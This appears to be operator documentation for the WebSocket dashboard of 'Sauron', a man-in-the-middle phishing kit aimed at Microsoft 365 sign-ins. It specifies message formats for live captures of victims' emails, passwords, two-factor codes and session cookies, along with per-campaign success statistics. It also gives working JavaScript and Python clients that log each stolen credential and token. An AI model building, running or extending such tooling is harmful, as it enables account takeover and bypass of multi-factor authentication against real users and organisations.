The WebSocket dashboard provides real-time monitoring of your Sauron MITM operations. Connect to receive live updates on credential captures, visitor activity, and system status.
Live credential captures and visitor tracking
Slug statistics and conversion metrics
Admin key authentication required
// Connect to WebSocket endpoint
const ws = new WebSocket('wss://your-domain.com/ws');
// Send authentication
ws.onopen = function() {
ws.send(JSON.stringify({
type: 'auth',
// Authentication handled via Firestore headers
}));
};
// Handle incoming messages
ws.onmessage = function(event) {
const data = JSON.parse(event.data);
console.log('Received:', data);
};
Endpoint: wss://your-domain.com/ws
Authentication: Send admin key immediately after connection
Establish WebSocket connection to /ws endpoint
Send admin key in authentication message
Server confirms authentication and begins sending updates
Real-time notification when credentials are captured
{
"type": "credential_capture",
"timestamp": "2024-01-15T10:30:45Z",
"data": {
"slug": "sales-q1",
"email": "user@company.com",
"password": "captured_password",
"user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)...",
"ip": "192.168.1.100",
"location": {
"country": "United States",
"region": "California",
"city": "San Francisco"
}
}
}
Notification when two-factor authentication tokens are captured
{
"type": "2fa_capture",
"timestamp": "2024-01-15T10:32:15Z",
"data": {
"slug": "sales-q1",
"token": "123456",
"method": "authenticator_app",
"hostname": "login.microsoftonline.com",
"user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)..."
}
}
Full cookie capture from authenticated sessions
{
"type": "cookie_dump",
"timestamp": "2024-01-15T10:33:30Z",
"data": {
"slug": "sales-q1",
"email": "user@company.com",
"cookies": "ESTSAUTH=...; ESTSAUTHPERSISTENT=...",
"hostname": "login.microsoftonline.com",
"user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)..."
}
}
Track user navigation and behavior
{
"type": "session_event",
"timestamp": "2024-01-15T10:31:00Z",
"data": {
"slug": "sales-q1",
"url": "https://login.microsoftonline.com/common/oauth2/authorize",
"pathname": "/common/oauth2/authorize",
"hostname": "login.microsoftonline.com",
"title": "Sign in to your account",
"referrer": "",
"user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)..."
}
}
Real-time statistics updates for slug performance
{
"type": "slug_stats",
"timestamp": "2024-01-15T10:35:00Z",
"data": {
"slug": "sales-q1",
"stats": {
"visits": 157,
"logs": 92,
"valid": 25,
"invalid": 13
}
}
}
The WebSocket interface allows real-time slug management and monitoring.
// Send slug creation request
ws.send(JSON.stringify({
type: 'create_slug',
data: {
slug: 'new-operation-2024',
user_id: 'your_user_id'
}
}));
// Request statistics for specific slug
ws.send(JSON.stringify({
type: 'get_stats',
data: {
slug: 'sales-q1'
}
}));
class SauronDashboard {
constructor(domain, adminKey) {
this.ws = new WebSocket(`wss://${domain}/ws`);
this.adminKey = adminKey;
this.setupEventHandlers();
}
setupEventHandlers() {
this.ws.onopen = () => {
console.log('Connected to Sauron dashboard');
this.authenticate();
};
this.ws.onmessage = (event) => {
const data = JSON.parse(event.data);
this.handleMessage(data);
};
this.ws.onerror = (error) => {
console.error('WebSocket error:', error);
};
}
authenticate() {
this.ws.send(JSON.stringify({
type: 'auth',
admin_key: this.adminKey
}));
}
handleMessage(data) {
switch(data.type) {
case 'credential_capture':
this.onCredentialCapture(data.data);
break;
case 'slug_stats':
this.updateSlugStats(data.data);
break;
case '2fa_capture':
this.on2FACapture(data.data);
break;
case 'cookie_dump':
this.onCookieDump(data.data);
break;
}
}
onCredentialCapture(data) {
console.log('New credential captured:', data);
// Update dashboard UI
this.showNotification(`New credential: ${data.email}`);
this.updateCaptureCounter();
}
updateSlugStats(data) {
console.log('Stats update for slug:', data.slug, data.stats);
// Update statistics display
}
}
// Usage
const dashboard = new SauronDashboard('your-domain.com', 'your_admin_key');
import asyncio
import websockets
import json
class SauronMonitor:
def __init__(self, domain, admin_key):
self.domain = domain
self.admin_key = admin_key
self.uri = f"wss://{domain}/ws"
async def connect(self):
async with websockets.connect(self.uri) as websocket:
# Authenticate
auth_msg = {
"type": "auth",
"admin_key": self.admin_key
}
await websocket.send(json.dumps(auth_msg))
# Listen for messages
async for message in websocket:
data = json.loads(message)
await self.handle_message(data)
async def handle_message(self, data):
msg_type = data.get('type')
if msg_type == 'credential_capture':
print(f"🎯 Credential captured: {data['data']['email']}")
await self.log_credential(data['data'])
elif msg_type == 'slug_stats':
print(f"📊 Stats update: {data['data']}")
elif msg_type == '2fa_capture':
print(f"🔐 2FA token captured: {data['data']['token']}")
async def log_credential(self, credential_data):
# Save to database, send alerts, etc.
pass
# Usage
monitor = SauronMonitor('your-domain.com', 'your_admin_key')
asyncio.run(monitor.connect())
Check that Sauron is running and WebSocket endpoint is accessible
sudo systemctl status sauron
Verify admin key is correct and matches server configuration
grep ADMIN_KEY .env
Ensure authentication was successful and slugs are active
Check WebSocket authentication response
Verify SSL certificate is valid for WebSocket connections
openssl s_client -connect domain:443